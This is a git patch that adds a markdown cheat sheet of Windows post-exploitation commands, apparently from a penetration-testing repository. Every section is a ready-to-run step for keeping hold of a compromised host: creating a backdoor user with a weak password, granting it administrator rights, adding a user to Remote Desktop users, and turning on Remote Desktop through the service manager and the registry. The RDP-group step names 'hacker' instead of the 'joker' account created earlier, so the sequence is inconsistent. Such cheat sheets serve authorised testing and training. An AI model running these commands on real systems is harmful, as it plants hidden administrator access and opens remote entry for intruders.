From db831da1fae5f1c31aa61ca6e9b80ec9a6badb7e Mon Sep 17 00:00:00 2001 From: Omar Santos Date: Sun, 18 Jul 2021 23:33:45 -0400 Subject: [PATCH] Create misc-windows-post-exploitation.md --- .../misc-windows-post-exploitation.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 post_exploitation/misc-windows-post-exploitation.md diff --git a/post_exploitation/misc-windows-post-exploitation.md b/post_exploitation/misc-windows-post-exploitation.md new file mode 100644 index 0000000..f813fc4 --- /dev/null +++ b/post_exploitation/misc-windows-post-exploitation.md @@ -0,0 +1,37 @@ +# Misc Windows Post Exploitation Tasks + +### Adding a Windows User (joker): +``` +net user /add joker password123 +``` + +### Adding a user to the Administrators groups +``` +net localgroup administrators /add joker +``` + +### Adding a user to the Remote Desktop user group +``` +net localgroup "Remote Desktop users" hacker /add +``` + +### Starting the Remote Desktop service +``` +net start TermService +``` + +### Verifying if the Remote Desktop Service is active and running +``` +tasklist /svc | findstr /C:TermService +``` + +### Permanently enable Terminal Services +``` +sc config TermService start=auto +``` + +### Enabling Terminal services via the registry +Note: You need to reboot after invoking this... +``` +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +```